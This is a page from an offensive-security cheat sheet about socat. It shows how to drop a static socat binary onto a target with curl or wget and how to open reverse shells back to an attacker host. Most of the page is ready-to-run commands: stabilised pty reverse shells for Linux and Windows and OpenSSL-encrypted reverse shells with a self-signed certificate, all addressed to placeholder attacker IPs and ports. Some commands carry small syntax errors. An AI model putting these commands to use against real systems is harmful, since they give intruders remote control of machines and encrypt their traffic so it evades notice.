socat

Using basic methods such as netcat will generate a shell that might not be stable: terminates with ctrl+Z, non-interactive shell, etc. Alternative methods are available:

Socat is generally more stable on Linux systems compared to Windows (target machine). As socat might not be installed on all target Linux systems, it will need to be installed. However, the common method of using apt install or apt-get install is not ideal as it requires multiple dependencies and other possible configurations.

Instead, a static compiled binary (without dependencies) can be installed from a direct HTTP URL on the target machine using tools such as curl or wget. Link: https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/socat?raw=true

$ curl https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/socat?raw=true --output /bin/socat
$ wget https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/socat?raw=true -O /bin/socat

Note: The output directory depends on a few factors such as the current working directory, or the value of the $SHELLenvironment variable. This is important to ensure the installed binary can be executed from the target machine.

Hosting the binary on a publicly accessible attacker-controlled machine

The binary can also be hosted on another attacker-controlled machine on the internet, and be accessed via a simple Python web server running on that machine.

Reverse shell

Target machine (initiate revere shell connection)

$ socat tcp:[attacker_ip]:[attacker_port] EXEC:"bash -li

Attacker machine (listening)

$ socat tcp-l:[listen_port] -

Best reverse shell experience

Target machine

Linux
$ socat TCP:<ATTCKER>:8888 EXEC:"bash -li",pty,stderr,sigint,setsid,sane
Windows
$ socat TCP:<ATTCKER>:8888 EXEC:"cmd.exe",pty,stderr,sigint,setsid,sane

Attacker machine

$ socat tcp-l:8888 FILE:`tty`,raw,echo=0

Encrypted shell with OpenSSL

Creating a self-signed certificate (on the attacker machine)

$ openssl req --newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt

  1. req: Specifies to create a certificate request or certificate.

  • In this case, the -x509 flag is specified, which indicates to create a self-signed certificate

  1. --newkeyrsa:2048: This specifies that a new private key should be generated with the RSA algorithm, using a key size of 2048 bits.

Merge the two created files shell.key and shell.crt to the file shell.pem

$ cat shell.key shell.crt > shell.pem

Reverse shell

Listen on attacker machine

$ socat openssl-listen:<listen_port>,cert=shell.pem,verify=0 -

  • cert=shell.pem: Specify to use the certificateshell.pem

  • verify=0: This tells OpenSSL to not validate the certificate

Connect from the target machine

$ socat openssl:<attacker_ip>:<attacker_port>,verify=0 EXEC:/bin/bash

Stable encrypted reverse shell

Attacker

$ socat openssl-listen:<listen_port>,cert=<cert>,verify=0 FILE:`tty`,raw,echo=0

Target

$ socat openssl:<attacker_ip>:<attacker_port>,verify=0 EXEC:"bash -li",pty,stderr,sigint,setsid,sane

PreviousnetcatNextpowershell

Last updated